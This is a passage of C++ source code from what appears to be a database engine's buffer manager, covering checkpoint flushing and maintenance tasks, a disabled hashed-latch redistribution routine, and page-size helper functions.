// Rather than do incremental pass II flushing, go to pass N, and reset
// the flusher all the way to the beginning of the OB0.
//
lgposFlushStart = lgposMin;
}
// flush all pages that are impeding the checkpoint
LGPOS lgposFlushStop = lgposPreferredCheckpoint; // try to go to the checkpoint.
LGPOS lgposFlushForwardProgress = lgposMin;
err = ErrBFIOB0MaintScan( ifmp, pbffmp,
lgposNewest,
cbCheckpointDepth,
&lockOB0Pass2N,
lgposFlushStart,
&lgposFlushStop,
&lgposFlushForwardProgress,
BFOB0MaintOperations( bfob0moFlushing | bfob0moVersioning | bfob0moCleaning | ( fQuiesceCheckpoint ? bfob0moQuiescing : 0 ) ) );
Assert( CmpLgpos( lgposFlushForwardProgress, lgposMin ) );
pbffmp->lgposFlusherBM = lgposFlushForwardProgress; // record as far as we got.
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass %c: Flusher: start=%08x,%04x,%04x - stopBM=%08x,%04x,%04x",
(ULONG)ifmp, fActivateTheReFlusher ? 'N' : '2',
lgposFlushStart.lGeneration, lgposFlushStart.isec, lgposFlushStart.ib,
lgposFlushStop.lGeneration, lgposFlushStop.isec, lgposFlushStop.ib
) );
if ( FOSTraceTagEnabled( JET_tracetagBufferManagerMaintTasks ) )
{
char rgOB0Stats[lockOB0Pass2N.cchStatsString];
lockOB0Pass2N.SPrintStats( rgOB0Stats );
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP [ifmp=0x%x]: Pass %c: Flusher - OB0 Index stats: %s", (ULONG)ifmp, fActivateTheReFlusher ? 'N' : '2', rgOB0Stats ) );
}
//
// Normalize any other condition experienced during checkpoint advancement
// to an error to indicate there is still work to do, but not b/c too many
// IOs.
//
if ( err != JET_errSuccess &&
err != errDiskTilt )
{
if ( pbffmp->ChkAdvData.cFlushErrPageFlushed ||
pbffmp->ChkAdvData.cFlushErrPageFlushPending ||
pbffmp->ChkAdvData.cFlushErrRemainingDependencies ||
pbffmp->ChkAdvData.cFlushErrDependentPurged ||
pbffmp->ChkAdvData.cFlushErrLatchConflict )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c flushes pending, dependencies, etc", (ULONG)ifmp ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
else if ( err == errBFIPageTouchTooRecent )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: success b/c errBFIPageTouchTooRecent", (ULONG)ifmp ) );
err = JET_errSuccess;
}
else
{
// Any unknown error, log full or something, just resched ...
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c unknown errors", (ULONG)ifmp ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
}
if ( err == JET_errSuccess && !fQuiesceCheckpoint && pfmp->Pinst()->m_fCheckpointQuiesce )
{
// Quiesce bit flipped to true on us while we were executing.
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c we changed our mind on quiescing", (ULONG)ifmp ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
//
// check if we have made any material progress in cleaning
//
LGPOS lgposCheckpointOB0 = lgposMin; // checkpoint as far as OB0 is concerned
BFIGetLgposOldestBegin0( ifmp, &lgposCheckpointOB0, fTrue );
if ( 0 == CmpLgpos( lgposCheckpointOB0, lgposMax ) )
{
// Setting it to lgposMin stops us from triggering the checkpoint update, but
// ideally once the OB0 is empty like this, we would want to trigger checkpoint
// update one more time.
lgposCheckpointOB0 = lgposMin;
}
#ifdef DEBUG
else
{
const LGPOS lgposCheckpointOB0Rounded = BFIOB0Lgpos( ifmp, lgposCheckpointOB0, fFalse );
Assert( 0 == CmpLgpos( &lgposCheckpointOB0, &lgposCheckpointOB0Rounded ) ); // uncertainty should already be factored in
}
#endif
const LGPOS lgposCheckpoint = BFIOB0Lgpos( ifmp, plog->LgposLGCurrentCheckpointMayFail(), fFalse );
Assert( fUrgentCheckpointUpdate || !fQuiesceCheckpoint );
if ( fUrgentCheckpointUpdate )
{
LGPOS lgposStopT = { 0 };
ERR errT = ErrBFIOB0MaintScan( ifmp, pbffmp,
lgposNewest,
cbCheckpointDepth,
&lockOB0Pass2N,
// used to have lgposCheckpointOB0 here to be specific, but lgposMin starts at the beginning
lgposMin,
&lgposPreferredCheckpoint,
&lgposStopT,
bfob0moCleaning );
// Refresh our OB0 as we may have made some progress from the bfob0moCleaning ErrBFIOB0MaintScan ...
lgposCheckpointOB0 = lgposMin;
BFIGetLgposOldestBegin0( ifmp, &lgposCheckpointOB0, fTrue );
if ( 0 == CmpLgpos( lgposCheckpointOB0, lgposMax ) )
{
// Setting it to lgposMin stops us from triggering the checkpoint update, but
// ideally once the OB0 is empty like this, we would want to trigger checkpoint
// update one more time.
lgposCheckpointOB0 = lgposMin;
}
#ifdef DEBUG
else
{
const LGPOS lgposCheckpointOB0Rounded = BFIOB0Lgpos( ifmp, lgposCheckpointOB0, fFalse );
Assert( 0 == CmpLgpos( &lgposCheckpointOB0, &lgposCheckpointOB0Rounded ) ); // uncertainty should already be factored in
}
#endif
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "CPUPD: bfob0moCleaning ifmp 0x%x lgposCheckpointOB0 %s to lgposStopT %s errT = %d",
(ULONG)ifmp,
OSFormatLgpos( LGPOS( lgposCheckpointOB0 ) ),
OSFormatLgpos( LGPOS( lgposStopT ) ),
errT ) );
const BOOL fEmptyOB0 = CmpLgpos( lgposMin, lgposCheckpointOB0 ) == 0; // means we're completely clean.
if ( fEmptyOB0 ||
( CmpLgpos( lgposCheckpoint, lgposCheckpointOB0 ) < 0 ) )
{
// we have made material progress with the OB0 vs. current checkpoint ... request checkpoint update
OSTrace( JET_tracetagBufferManagerMaintTasks,
OSFormat( "CPUPD: Pushing out checkpoint for fmp 0x%x because lgposCheckpoint %s could be improved to lgposOBO %s",
(ULONG)ifmp,
OSFormatLgpos( LGPOS( lgposCheckpoint ) ),
OSFormatLgpos( LGPOS( lgposCheckpointOB0 ) ) ) );
*pfUpdateCheckpoint = fTrue;
}
if ( err == JET_errSuccess &&
lgposWaypointLatency.lGeneration == 0 && // no LLR
!fEmptyOB0 &&
lgposCheckpointOB0.lGeneration != lgposStopT.lGeneration )
{
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks, OSFormat( "CP [ifmp=0x%x]: work remaining b/c lgposCheckpointOB0 does not match lgposStopT (%d != %d)", (ULONG)ifmp, lgposCheckpointOB0.lGeneration, lgposStopT.lGeneration ) );
err = ErrERRCheck( errBFICheckpointWorkRemaining );
}
}
OSTraceFMP( ifmp, JET_tracetagBufferManagerMaintTasks,
OSFormat( "CP: Checkpoint Adv error stats: err = %d\r\n"
"CP: ifmp = 0x%x\r\n"
"CP: cEntriesVisited = %d\r\n"
"CP: cCleanRemoved = %d\r\n"
"CP: cFlushErrSuccess = %d\r\n"
"CP: cFlushErrPageFlushed = %d\r\n"
"CP: cFlushErrPageFlushPending = %d\r\n"
"CP: cFlushErrRemainingDependencies = %d\r\n"
"CP: cFlushErrDependentPurged = %d\r\n"
"CP: cFlushErrLatchConflict = %d\r\n"
"CP: cFlushErrPageTouchTooRecent = %d\r\n"
"CP: cFlushErrOther = %d\r\n"
"CP: lgposCheckpoint = %08x:%04x:%04x\r\n"
"CP: lgposCheckpointOB0 = %08x:%04x:%04x\r\n",
err,
(ULONG)ifmp,
pbffmp->ChkAdvData.cEntriesVisited,
pbffmp->ChkAdvData.cCleanRemoved,
pbffmp->ChkAdvData.cFlushErrSuccess,
pbffmp->ChkAdvData.cFlushErrPageFlushed,
pbffmp->ChkAdvData.cFlushErrPageFlushPending,
pbffmp->ChkAdvData.cFlushErrRemainingDependencies,
pbffmp->ChkAdvData.cFlushErrDependentPurged,
pbffmp->ChkAdvData.cFlushErrLatchConflict,
pbffmp->ChkAdvData.cFlushErrPageTouchTooRecent,
pbffmp->ChkAdvData.cFlushErrOther,
lgposCheckpoint.lGeneration, lgposCheckpoint.isec, lgposCheckpoint.ib,
lgposCheckpointOB0.lGeneration, lgposCheckpointOB0.isec, lgposCheckpointOB0.ib ) );
return err;
}
// Checkpoint
CSemaphore g_semMaintCheckpointRequest( CSyncBasicInfo( _T( "g_semMaintCheckpointRequest" ) ) );
TICK g_tickMaintCheckpointLast;
POSTIMERTASK g_posttBFIMaintCheckpointITask = NULL;
POSTIMERTASK g_posttBFIMaintCacheStatsITask = NULL;
POSTIMERTASK g_posttBFIMaintIdleCacheStatsITask = NULL;
// requests that checkpoint maintenance be performed on behalf of dirty pages
// in the cache
void BFIMaintCheckpointRequest()
{
// try to acquire the right to request checkpoint maintenance
BOOL fAcquiredAsync = g_semMaintCheckpointRequest.FTryAcquire();
// if we acquired the right to maintain the checkpoint, then we will try
// to do so
if ( fAcquiredAsync )
{
// schedule a task to maintain the checkpoint
if ( ErrBFIMaintScheduleTask( g_posttBFIMaintCheckpointITask, NULL, dtickMaintCheckpointDelay, dtickMaintCheckpointFuzz ) >= JET_errSuccess )
{
// we have now lost our right to make async requests
fAcquiredAsync = fFalse;
}
}
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointRequest.CAvail() == 0 );
g_semMaintCheckpointRequest.Release();
}
}
#ifdef DEBUG
LONG g_cSingleThreadedCheckpointTaskCheck = 0;
#endif
// executes an async request to perform checkpoint maintenance
void BFIMaintCheckpointITask( VOID * pvGroupContext, VOID * pvRuntimeContext )
{
OSTrace( JET_tracetagBufferManagerMaintTasks, __FUNCTION__ );
OnDebug( LONG cBegin = AtomicIncrement( &g_cSingleThreadedCheckpointTaskCheck ) );
Expected( cBegin == 1 ); // OS layer timer task infra protects us from this
// this task automatically has the right to async maintenance
BOOL fAcquiredAsync = fTrue;
// maintain our checkpoint
BFIMaintCheckpointIUpdate();
// remember the time when we last maintained the checkpoint
g_tickMaintCheckpointLast = TickOSTimeCurrent();
// if we own the right to make async maintenance requests then
// we no longer need it
if ( fAcquiredAsync )
{
Assert( g_semMaintCheckpointRequest.CAvail() == 0 );
g_semMaintCheckpointRequest.Release();
}
OnDebug( LONG cEnd = AtomicDecrement( &g_cSingleThreadedCheckpointTaskCheck ) );
Assert( cEnd == 0 ); // OS layer timer task infra protects us from this
}
// updates the checkpoints for the specified instance
void BFIMaintCheckpointIUpdateInst( const size_t ipinst )
{
extern CRITPOOL< INST* > g_critpoolPinstAPI;
CCriticalSection *pcritInst = &g_critpoolPinstAPI.Crit(&g_rgpinst[ipinst]);
pcritInst->Enter();
INST *pinst = g_rgpinst[ ipinst ];
if ( pinstNil == pinst )
{
pcritInst->Leave();
return;
}
// Use APILock to exclude the initializing and
// terminating an instance.
const BOOL fAPILocked = pinst->APILock( pinst->fAPICheckpointing );
pcritInst->Leave();
if ( fAPILocked )
{
if ( pinst->m_fJetInitialized )
{
(void)pinst->m_plog->ErrLGUpdateCheckpointFile( fFalse );
}
pinst->APIUnlock( pinst->fAPICheckpointing );
}
}
// updates the checkpoints for every instance currently in use
void BFIMaintCheckpointIUpdate()
{
for ( size_t ipinst = 0; ipinst < g_cpinstMax; ipinst++ )
{
BFIMaintCheckpointIUpdateInst( ipinst );
}
}
#ifdef MINIMAL_FUNCTIONALITY
#else // !MINIMAL_FUNCTIONALITY
// Hashed Latches
const BOOL g_fBFMaintHashedLatches = fFalse; // permanently disabled
size_t g_icReqOld = 0;
size_t g_icReqNew = 1;
ULONG g_rgcReqSystem[ 2 ];
ULONG g_dcReqSystem;
// preserves numerical separation so tickEligibleForNomination, tickViewLastRefreshed, and
// iHashedLatch can all share the same storage.
TICK TickBFIHashedLatchTime( const TICK tickIn )
{
// iHashedLatch shares storage with tickEligibleForNomination, and as such a tick could
// be misinterpreted as a hashed latch. To avoid any potential headache here, because
// the valid iHashedLatch values are such a tiny part of the number space, we simply shift
// around this inconclusive area of the number space for ticks.
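// (e.g., illustrative: if cBFHashedLatch were 16, ticks 0..15 would be remapped to 17, so a
//  stored value below cBFHashedLatch can always be interpreted as a hashed latch index.)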
return ( tickIn < (ULONG)cBFHashedLatch ) ? ( cBFHashedLatch + 1 ) : tickIn;
}
// executes an async request to maintain our hashed latches
void BFIMaintHashedLatchesITask( DWORD_PTR )
{
OSTrace( JET_tracetagBufferManagerHashedLatches, __FUNCTION__ );
Enforce( g_fBFMaintHashedLatches );
// Ex12 Beta 2: disable hashed latches by default and allow them to be
// re-enabled via a registry key that we query once per second. this is
// being done because we reviewed the BF code and it seems that there are
// some timing holes in how these latches are used that may be causing
// some of the unexplained behavior we have been seeing related to page
// dependencies and data corruption. we will investigate the locking
// scheme in Ex12 RTM
WCHAR wszBuf[ 16 ] = { 0 };
BOOL fEnableHashedLatches = fFalse;
if ( FOSConfigGet( L"BF", L"Enable Hashed Latches", wszBuf, sizeof( wszBuf ) ) &&
wszBuf[ 0 ] )
{
fEnableHashedLatches = !!_wtol( wszBuf );
}
// redistribute our hashed latches for the next period
if ( fEnableHashedLatches )
{
BFIMaintHashedLatchesIRedistribute();
}
}
// automatically redistributes the hashed latches to the BFs containing the
// hottest page data in the cache
void BFIMaintHashedLatchesIRedistribute()
{
const size_t cProc = OSSyncGetProcessorCountMax();
size_t iProc;
size_t iNominee;
size_t iHashedLatch;
ULONG rgdcReqNomineeSum[ cBFNominee ];
ULONG rgdcReqNomineeMax[ cBFNominee ];
ULONG rgdcReqHashedLatchSum[ cBFHashedLatch ];
ULONG dcReqHashedLatchTotal;
size_t iNomineeWinner;
ULONG dcReqNomineeSumWinner;
size_t iHashedLatchLoser;
ULONG dcReqHashedLatchSumLoser;
PBF pbfElect;
PBF pbfLoser;
PBF pbfWinner;
// collect the raw latch counts for the system, the nominee elect, each
// nominee, and each hashed latch
PERFOpt( g_rgcReqSystem[ g_icReqNew ] = cBFCacheReq.Get( perfinstGlobal ) );
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
ppls->rgcreqBFNominee[ g_icReqNew ][ iNominee ] = ppls->rgBFNominee[ iNominee ].cCacheReq;
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
ppls->rgcreqBFHashedLatch[ g_icReqNew ][ iHashedLatch ] = ppls->rgBFHashedLatch[ iHashedLatch ].cCacheReq;
}
}
// compute the latch count for the sampling interval for the above data
g_dcReqSystem = g_rgcReqSystem[ g_icReqNew ] - g_rgcReqSystem[ g_icReqOld ];
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
ppls->rgdcreqBFNominee[ iNominee ] = ppls->rgcreqBFNominee[ g_icReqNew ][ iNominee ] - ppls->rgcreqBFNominee[ g_icReqOld ][ iNominee ];
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
ppls->rgdcreqBFHashedLatch[ iHashedLatch ] = ppls->rgcreqBFHashedLatch[ g_icReqNew ][ iHashedLatch ] - ppls->rgcreqBFHashedLatch[ g_icReqOld ][ iHashedLatch ];
}
}
// swap old and new data sets for the next data collection cycle
g_icReqOld = g_icReqOld ^ 1;
g_icReqNew = g_icReqNew ^ 1;
// cook the latch count data to support our decision making
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
rgdcReqNomineeSum[ iNominee ] = 0;
rgdcReqNomineeMax[ iNominee ] = 0;
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
rgdcReqHashedLatchSum[ iHashedLatch ] = 0;
}
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
for ( iNominee = 0; iNominee < cBFNominee; iNominee++ )
{
rgdcReqNomineeSum[ iNominee ] += ppls->rgdcreqBFNominee[ iNominee ];
rgdcReqNomineeMax[ iNominee ] = max( rgdcReqNomineeMax[ iNominee ], ppls->rgdcreqBFNominee[ iNominee ] );
}
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
rgdcReqHashedLatchSum[ iHashedLatch ] += ppls->rgdcreqBFHashedLatch[ iHashedLatch ];
}
}
dcReqHashedLatchTotal = 0;
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
dcReqHashedLatchTotal += rgdcReqHashedLatchSum[ iHashedLatch ];
}
// choose the winning nominee as follows:
// - it doesn't have a majority of its latches on one processor
// - it has the highest latch count of qualifying nominees
iNomineeWinner = 0;
dcReqNomineeSumWinner = 0;
for ( iNominee = 1; iNominee < cBFNominee; iNominee++ )
{
const PBF pbfNominee = Ppls( 0 )->rgBFNominee[ iNominee ].pbf;
if ( pbfNominee != pbfNil &&
rgdcReqNomineeMax[ iNominee ] < pctProcAffined * rgdcReqNomineeSum[ iNominee ] &&
dcReqNomineeSumWinner < rgdcReqNomineeSum[ iNominee ] )
{
iNomineeWinner = iNominee;
dcReqNomineeSumWinner = rgdcReqNomineeSum[ iNominee ];
}
}
// choose the hashed latch with the smallest latch count as the loser
iHashedLatchLoser = 0;
dcReqHashedLatchSumLoser = ULONG( ~0 );
for ( iHashedLatch = 0; iHashedLatch < cBFHashedLatch; iHashedLatch++ )
{
if ( dcReqHashedLatchSumLoser > rgdcReqHashedLatchSum[ iHashedLatch ] )
{
iHashedLatchLoser = iHashedLatch;
dcReqHashedLatchSumLoser = rgdcReqHashedLatchSum[ iHashedLatch ];
}
}
// we will promote the nominee elect if:
// - it doesn't have a majority of its latches on one processor
// - its latch count exceeds the latch count of the loser
    //  - we can try to acquire the X Latch on the nominee elect and the loser
// - we can demote the loser to a normal latch
pbfElect = Ppls( 0 )->rgBFNominee[ 0 ].pbf;
pbfLoser = Ppls( 0 )->rgBFHashedLatch[ iHashedLatchLoser ].pbf;
if ( pbfElect != pbfNil &&
rgdcReqNomineeMax[ 0 ] < pctProcAffined * rgdcReqNomineeSum[ 0 ] &&
rgdcReqNomineeSum[ 0 ] > dcReqHashedLatchSumLoser )
{
if ( pbfElect->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( pbfLoser == pbfNil ||
pbfLoser->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
if ( pbfLoser == pbfNil || FBFILatchDemote( pbfLoser ) )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( iProc );
ppls->rgBFNominee[ 0 ].pbf = pbfNil;
ppls->rgBFHashedLatch[ iHashedLatchLoser ].pbf = pbfElect;
}
pbfElect->iHashedLatch = iHashedLatchLoser;
pbfElect->bfls = bflsHashed;
if ( pbfLoser != pbfNil )
{
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s in slot %d demoted (%.2f percent %d)",
OSFormatPointer( pbfLoser ),
(ULONG)iHashedLatchLoser,
100.0 * dcReqHashedLatchSumLoser / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
dcReqHashedLatchSumLoser ) );
}
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s promoted to slot %d (%.2f percent %d %.2f percent)",
OSFormatPointer( pbfElect ),
(ULONG)iHashedLatchLoser,
100.0 * rgdcReqNomineeSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
rgdcReqNomineeSum[ 0 ],
100.0 * rgdcReqNomineeMax[ 0 ] / rgdcReqNomineeSum[ 0 ] ) );
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "Hashed Latch Summary:\r\n"
"---------------------\r\n"
" 0 %.2f percent\r\n"
" 1 %.2f percent\r\n"
" 2 %.2f percent\r\n"
" 3 %.2f percent\r\n"
" 4 %.2f percent\r\n"
" 5 %.2f percent\r\n"
" 6 %.2f percent\r\n"
" 7 %.2f percent\r\n"
" 8 %.2f percent\r\n"
" 9 %.2f percent\r\n"
"10 %.2f percent\r\n"
"11 %.2f percent\r\n"
"12 %.2f percent\r\n"
"13 %.2f percent\r\n"
"14 %.2f percent\r\n"
"15 %.2f percent\r\n"
"Total %.2f percent",
100.0 * rgdcReqHashedLatchSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 1 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 2 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 3 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 4 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 5 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 6 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 7 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 8 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 9 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 10 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 11 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 12 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 13 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 14 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 15 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * dcReqHashedLatchTotal / ( g_dcReqSystem ? g_dcReqSystem : 100 ) ) );
}
if ( pbfLoser != pbfNil )
{
pbfLoser->sxwl.ReleaseExclusiveLatch();
}
}
pbfElect->sxwl.ReleaseExclusiveLatch();
}
}
// if there was a nominee elect and we decided not to promote it then
// strip it of its nominee elect status and make it ineligible for
// nomination for a while
else if ( pbfElect != pbfNil )
{
Assert( pbfElect->bfat == bfatFracCommit );
if ( pbfElect->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
BFNominee* const pbfn = &Ppls( iProc )->rgBFNominee[ 0 ];
pbfn->pbf = pbfNil;
}
pbfElect->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() + dtickPromotionDenied );
pbfElect->bfls = bflsNormal;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s denied promotion (%.2f percent %d %.2f percent %d)",
OSFormatPointer( pbfElect ),
100.0 * rgdcReqNomineeSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
rgdcReqNomineeSum[ 0 ],
100.0 * rgdcReqNomineeMax[ 0 ] / rgdcReqNomineeSum[ 0 ],
dcReqHashedLatchSumLoser ) );
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "Hashed Latch Summary:\r\n"
"---------------------\r\n"
" 0 %.2f percent\r\n"
" 1 %.2f percent\r\n"
" 2 %.2f percent\r\n"
" 3 %.2f percent\r\n"
" 4 %.2f percent\r\n"
" 5 %.2f percent\r\n"
" 6 %.2f percent\r\n"
" 7 %.2f percent\r\n"
" 8 %.2f percent\r\n"
" 9 %.2f percent\r\n"
"10 %.2f percent\r\n"
"11 %.2f percent\r\n"
"12 %.2f percent\r\n"
"13 %.2f percent\r\n"
"14 %.2f percent\r\n"
"15 %.2f percent\r\n"
"Total %.2f percent",
100.0 * rgdcReqHashedLatchSum[ 0 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 1 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 2 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 3 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 4 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 5 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 6 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 7 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 8 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 9 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 10 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 11 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 12 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 13 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 14 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * rgdcReqHashedLatchSum[ 15 ] / ( g_dcReqSystem ? g_dcReqSystem : 100 ),
100.0 * dcReqHashedLatchTotal / ( g_dcReqSystem ? g_dcReqSystem : 100 ) ) );
pbfElect->sxwl.ReleaseExclusiveLatch();
}
}
// if there is no nominee elect and there is a winning nominee then make
// it the new nominee elect
pbfWinner = Ppls( 0 )->rgBFNominee[ iNomineeWinner ].pbf;
if ( Ppls( 0 )->rgBFNominee[ 0 ].pbf == pbfNil && pbfWinner != pbfNil )
{
if ( pbfWinner->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( cProc - 1 - iProc );
ppls->rgBFNominee[ iNomineeWinner ].pbf = pbfNil;
ppls->rgBFNominee[ 0 ].pbf = pbfWinner;
}
pbfWinner->bfls = bflsElect;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s in slot %d elected (%d %.2f percent)",
OSFormatPointer( pbfWinner ),
(ULONG)iNomineeWinner,
rgdcReqNomineeSum[ iNomineeWinner ],
100.0 * rgdcReqNomineeMax[ iNomineeWinner ] / rgdcReqNomineeSum[ iNomineeWinner ] ) );
pbfWinner->sxwl.ReleaseExclusiveLatch();
}
}
// purge the losing nominees so that new BFs can try for a hashed latch.
// also prevent the losers from being nominated again for a while to help
// give those BFs a chance to get in
for ( iNominee = 1; iNominee < cBFNominee; iNominee++ )
{
if ( iNominee != iNomineeWinner )
{
const PBF pbfNominee = Ppls( 0 )->rgBFNominee[ iNominee ].pbf;
if ( pbfNominee != pbfNil &&
pbfNominee->sxwl.ErrTryAcquireExclusiveLatch() == CSXWLatch::ERR::errSuccess )
{
for ( iProc = 0; iProc < cProc; iProc++ )
{
PLS* const ppls = Ppls( cProc - 1 - iProc );
ppls->rgBFNominee[ iNominee ].pbf = pbfNil;
}
pbfNominee->tickEligibleForNomination = TickBFIHashedLatchTime( TickOSTimeCurrent() + dtickLosingNominee );
pbfNominee->bfls = bflsNormal;
OSTrace(
JET_tracetagBufferManagerHashedLatches,
OSFormat( "BF %s in slot %d purged (%d %.2f percent)",
OSFormatPointer( pbfNominee ),
(ULONG)iNominee,
rgdcReqNomineeSum[ iNominee ],
100.0 * rgdcReqNomineeMax[ iNominee ] / rgdcReqNomineeSum[ iNominee ] ) );
pbfNominee->sxwl.ReleaseExclusiveLatch();
}
}
}
}
#endif // MINIMAL_FUNCTIONALITY
// Cache Size
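// g_semMaintCacheStatsRequest serializes the right to schedule/run the cache stats task,
// g_semMaintCacheSize serializes cache size maintenance (grow/shrink), and
// g_cMaintCacheSizePending counts resize requests registered so the current semaphore owner
// can notice requests that arrived while it was working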
CSemaphore g_semMaintCacheStatsRequest( CSyncBasicInfo( _T( "g_semMaintCacheStatsRequest" ) ) );
CSemaphore g_semMaintCacheSize( CSyncBasicInfo( _T( "g_semMaintCacheSize" ) ) );
LONG g_cMaintCacheSizePending = 0;
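// returns the smallest buffer size bucket that can hold cbSize bytes, or icbPageInvalid if none fits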
inline ICBPage IcbBFIBufferSize( __in const INT cbSize )
{
for( ICBPage icbBuffer = icbPageSmallest; icbBuffer < icbPageMax; icbBuffer++ )
{
if ( cbSize <= g_rgcbPageSize[icbBuffer] )
{
return icbBuffer;
}
}
return icbPageInvalid;
}
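// maps an exact physical page size (4/8/16/32 KB) to its ICBPage index; asserts on any other size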
inline _Ret_range_( icbPageInvalid, icbPageBiggest ) ICBPage IcbBFIPageSize( __in const INT cbSize )
{
switch( cbSize )
{
case (4*1024):
return icbPage4KB;
case (8*1024):
return icbPage8KB;
case (16*1024):
return icbPage16KB;
case (32*1024):
return icbPage32KB;
}
AssertSz( fFalse, "Invalid page size request (cb = %d)", cbSize );
return icbPageInvalid;
}
INLINE __int64 CbBFICacheUsed( const BOOL fFullyHydrated )
{
__int64 cb = 0;
INT icbPage = icbPageSmallest;
INT icbCacheMaxT = g_icbCacheMax;
